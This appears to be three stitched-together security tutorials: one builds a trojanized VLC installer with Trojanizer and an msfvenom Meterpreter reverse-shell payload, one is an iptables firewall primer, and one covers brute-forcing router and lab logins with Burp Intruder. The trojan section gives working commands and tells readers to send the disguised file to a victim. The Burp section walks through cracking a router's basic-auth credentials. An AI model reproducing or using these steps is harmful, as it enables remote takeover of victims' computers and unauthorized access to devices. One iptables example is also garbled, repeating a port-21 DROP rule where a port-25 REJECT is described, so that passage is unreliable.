Bind payload using SFX archive with Trojanizer

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable (.exe) archive. The SFX archive when executed it will run both files (our payload and the legit application at the same time).

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

Now Before Running the Trojanizer we will create a payload using msfvenom

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using

Command: ./Trojanizer.sh

Trojanizer has some prerequisites which it will try to install on the initial run. If it could install you could install manually the below mentioned prerequisites.

Wine Program Files, WinRAR Software and Zenity.

After Loading the Tool, it will ask you if you want to execute the Framework

Clicking Yes Will Open a Window Titled Payload to Be Compressed, here we will select the payload that we created using msfvenom in the beginning of the practical.

After selecting the payload another window will open titled Legit Application to Trojanize

Here we will have to select any legit or original software file (.exe) to bind with our payload. I am binding VLC Player Installer File with my payload.

After clicking OK we will be asked for a New Name for the combined file. Keep it like any installer File. For Example: vlc-32bit-Installer or vlc-update64 or anything of your choice.

Now we will have to select any icon for our combined file. You can choose from the list given by default or you can download any icon file (.ico) from Google.

I have downloaded the VLC Icon. As you can see in the above image I am adding the vlc-icon.ico file as an icon.

Note: Trojanizer works with WINRAR and because of that many a times this icon doesn’t bind with the combined file, instead it shows a WinRAR icon. It is a bug we soon hope will be fixed.

After selecting the icon file. You will be granted with this window informing you about the path of the newly payload combined software.

Now Let’s Start a Listener on the port we mentioned as a lhost earlier. Start with opening Metasploit Framework by typing

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now send the malicious software to the victim by any means you desire.

When the user will open the file, he will be greeted with the normal security warning as it is normally shown.

After clicking Run the user will have the VLC installer running and he won’t suspect anything.

But as he clicks Run we will also have his meterpreter session as shown below.

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.

Beginner Guide to IPtables

Hello friends!! In this article we are going to discuss on Iptables and its uses. Iptables is a command-line firewall, installed by default on all official Ubuntu distributions. Using Iptables, you can label a set of rules, that will be go after by the Linux kernel to verify all incoming and outgoing network traffic.

Today we will look at some basic concept of Ipatble using various Iptables options to generate a Filter Table which will filter the incoming and outgoing traffic

Basic Iptables Options

-A :  Add this rule to a rule chain.

-L:  List the current filter rules.

-m conntrack : Allow filter rules to match based on connection state. Permits the use of the --ctstate option.

--ctstate: Define the list of states for the rule to match on. Valid states are:

·         NEW - The connection has not yet been seen.

·         RELATED - The connection is new, but is related to another connection already permitted.

·         ESTABLISHED - The connection is already established.

·         INVALID - The traffic couldn't be identified for some reason.

-m limit: Require the rule to match only a limited number of times. Allows the use of the --limit option.

Useful for limiting logging rules:

·         --limit - The maximum matching rate, given as a number followed by "/second", "/minute", "/hour", or "/day" depending on how often you want the rule to match. If this option is not used and -m limit is used, the default is "3/hour".

-p: Describe the connection protocol used.

--dport :  The destination port(s) required for this rule. A single port may be given, or a range may be given as start: end, which will match all ports from start to end, inclusive.

-j :  Jump to the specified target. By default, iptables allows four targets:

·         ACCEPT - Accept the packet and stop processing rules in this chain.

·         REJECT - Reject the packet and notify the sender that we did so, and stop processing rules in this chain.

·         DROP - Silently ignore the packet, and stop processing rules in this chain.

·         LOG - Log 

-I: Inserts a rule. Takes two options, the chain to insert the rule into, and the rule number it should be.

-I:  INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.

-s: --source - address [/mask] source specification

-d: --destination - address[/mask] destination specification

Iptables follow Ipchain rules which is nothing but the bunch of firewall rules to control incoming and outgoing traffic

Three Important Types Iptable chains

Input Chain:  Input chain rule rule is used to manage the activities of incoming traffic towards server.

Output Chain: Ouput chain rule is used to manage the activities of outgoing traffic from your server.

Forward Chain: A forward chain rule is used for adding up rules related to forwarding of an ip packet. This is usually used while you have a Linux machine as router linking two networks collectively.

As discribed above by default install iptable is availabe in all Ubuntu distribution but if it is not installed in any Linux based system and you want to install it then excute given below command.

sudo apt-get install iptables

By default iptable is blank which allows all incoming and outgoing connection traffic without filtering them. In order to verify inbuilt rules of iptable we need to execute following command which displays the list of rules if added in iptables.

sudo iptables -L -v

here -L is used for display the chain rules of iptables and  -v for complete information.

Allow Incoming Traffic

In order to allow traffic for any particular port you can use given below command here we have accept incoming on port 22 for SSH, 80 for HTTP and 443for HTTPS respectively

sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT

So it will allow tcp connection when traffic will coming on port 22, 80 and 443.

Drop/Deny Incoming Traffic

In order to deny traffic for any particular port you can use given below command here we have drop incoming on port 21 for FTP and 23 for Telnet respectively

sudo iptables -A INPUT -p tcp --dport 21 -j DROP

sudo iptables -A INPUT -p tcp --dport 23 -j DROP

So it will deny tcp connection when traffic will coming on port 21, 23 and give a message Time Out. 

Reject Incoming Traffic

Reject and Drop action closely work same in order to obstruct the incoming traffic from establishing connection with server only the difference is that, here it will send message with “ICMP message Port Unreachable” and reject the incoming packet. you can use given below command here we have reject incoming on port 25 for SMTP.

sudo iptables -A INPUT -p tcp --dport 21 -j DROP

So it will reject tcp connection when traffic will coming on port 25 and give a message Destination Port unreachable.

 Allow Incoming Traffic from Specific IP

In order to allow traffic form only a particular IP to establish a secure connection between server and client you can execute given below command

sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT

It will accept packet coming from network 192.168.1.104

Block Specific Network IP

In order to deny traffic form only a particular IP to establish a secure your server from attacker’s IP you can execute given below command

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

It will deny packet coming from network 192.168.1.102

Block Specific Network Interface

To block a specific network interface, for example eth0, execute given below command which drop the incoming traffic coming from 10.10.10.10

sudo iptables -A INPUT -i eth0 -s 10.10.10.10-j DROP

Here you can change the action to allow traffic from a particular network interface using –j ACCEPT options.

Block Specific IP Range

To block a specific IP range in order to deny, the incoming traffic coming from specific range of IP. Execute given below command which drop incoming packet coming from IP 192.168.1.100 till IP 192.168.1.200

sudo iptables -A INPUT -m iprange --src-range 192.168.1.100-192.168.1.200 -j DROP

Here you can change the action to allow traffic from a particular IP range using –j ACCEPT options.

Block Specific Mac Address

To block a specific Mac address in order to deny, the incoming traffic coming from specific machine. Execute given below command which drop incoming packet coming from given Mac address or attacker machine.

sudo iptables -A INPUT -m mac --mac-source FC:AA:14:6A:9A:A2 -j DROP

Here you can change the action to allow traffic from a particular Mac address using –j ACCEPT options.

BLOCK Ping Request

Network administrator always concern with network security therefore they always Block Ping request either by using Drop or Reject action , here we are blocking Ping request using DROP option as given in below command.

sudo iptables -A INPUT -p icmp -i eth0 -j DROP

View List of Applied Chain rules

In order to view our applied chain rules once again we are going to execute given below command which will dump list of Iptable rules.

sudo iptables -L

From given below image you can observe 4 columns which contains records of IPtable rules.

Here these columns define following information:

Target: Defines applied action

Prot: stand for Protocol type that can TCP, ICMP or UDP

Option: further option to define rule, here it is blank

Source: Incoming traffic network IP Address

Destination: Host IP address which will receive incoming traffic packet.

Now if someone tries to Ping the server machine as shown in given below image, so here you can read the message “Request timed out” which means the server machine has drop our ICMP request packet.

Deleting Any Rule

In order to delete any rule of your Iptable to remove it from inside your filter table you can use option -D with input rule number.  We are going to remove our last rule ICMP drop connection which was at number 12 in the given list of rule.

sudo iptables -D INPUT 12

Here you can replace number 12 from any other number which rule you wish to remove according to your list of rules.

Let’s view our remaining chain rules once again using -L option as done above. From given below image you can observe that now the list contain only 11 rules and eliminated  rule ICMP drop the connection.

Flush IPtables

If you want to remove entire set of rule in order to flush your Iptable then use option -F to flush your ipatble applied rules and execute given below command.

sudo iptables -F

Now once again when we had viewed the list of rule, this time we got empty table as shown in given below image.

Source: https://help.ubuntu.com/community/IptablesHowTo

Payload Processing Rule in Burp suite (Part 2)

Hello friends!! Today we are going to discuss “Payload Encoding” option followed by payload processing of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Encode
The processing rule can be used to encode the payload using various schemes such as URL, HTML, Base64, ASCII hex or constructed strings.
Let's start!!

First, we have intercepted the request of the login page of the router by giving its default IP which is 192.168.1.1, where we have given an invalid username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·          Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.

·         Choose the Attack type as sniper.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary, therefore I have made a dictionary.

Before executing the attack we have added a payload processing rule to the payload type which is Encode and we have selected “Base64 encode” scheme because we know router takes the value in Base64.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because this will start brute force attack and try to match string for user authentication. In screenshot you can the status and length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 10. Now check the username and password of 10th line in dictionary. 

And to confirm the username and password matched, we will give the password in the Router's Login Page, which will successfully log us into the Router's Configuration Page. This shows our success in the attack as shown in the image.

Decode
This processing rule can be used to decode the payload using various schemes: URL, HTML, Base64 or ASCII hex. As we know decoding is nothing but reversing the encoding. It can be used in an opposite way in which encoding is carried out.
Hash
This processing rule can be used to carry out a hashing operation on the payload. There are 7 types of hashing algorithms are available in this payload processing rule which is as follows:

·         SHA-384

·         SHA-224

·         SHA-256

·         MD5

·         MD2

·         SHA

·         SHA-512

First, we have intercepted the request of the Redirection Link designed to find redirection vulnerabilities in the LAB created by us and in the hash value of the URL we have given a wrong hash value of HTTP://www.google.com in place of the actual hash value of the HTTP://www.hackingarticles.in in the URL of the redirecting page. We have simply clicked on the Redirection link as shown in the image; the burp suite will capture the request of the redirecting page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack which is the hash value of the redirecting page and then click on Add button.

·         Choose the Attack type as sniper.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Hash and then we have selected MD5 which is a commonly used algorithm for converting URL of the websites into a Hash MD5 value. As you can see the input strings of the dictionary are in a simple text form, but this processing rule converts it into Hash MD5 values which can be seen in result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the Hash MD5 of the Redirecting Page which will give you the correct MD5 value. The moment it will find the correct value, it will change the value of length as shown in the image.

The Hash MD5 value, we will give the Hash value in the URL of the redirecting page which is HTTP://www.hackingarticles.in, which will successfully redirect us to HTTP://www.hackingarticles.in. This shows our success in the attack as shown in the image.

Add Raw Payload
This processing rule can be used to add raw payload value before or after the current processed value. For example it can come in handy whenever we want to submit the same payload in both raw and hashed form.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i. Now open the Intruder tab then select Positions tab and the following will be visible. Choose the Attack type as Sniper. Press on the Clear button as shown in the image. Now we will select the fields where we want to attack which is the password and click on Add button.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

• In the given below image we have selected password that means we will need one dictionary files for password.

Before executing the attack we have added a payload processing rule to the payload type which is Add Raw Payload and then we have selected Append Pre-processed Payload. This adds a raw payload value before and after the current processed value. As you can see the input strings of the dictionary as single input string is repeated twice which can be seen in result window of the attack.
Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Skip if Matches Regex
This processing rule can be used to check the current processed value matches a specified regular expression, and if it matches it will skip the payload and will move onto the next one. For example, Suppose we have a parameter value that have a minimum length and want to skip values in the list that are shorter than minimum length defined.
First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

·         Press on the Clear button given at right of window frame. 

·         Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.

·         Choose the Attack type as sniper.

• In the given below image we have selected password that means we will need one dictionary files for password.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Skip if Matches Regex where we have given an input of {@} in the match regex field. Here we see that as per this rule if the input given matches with any of the input strings in the dictionary it simply skip that value and move on to next.

Now Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.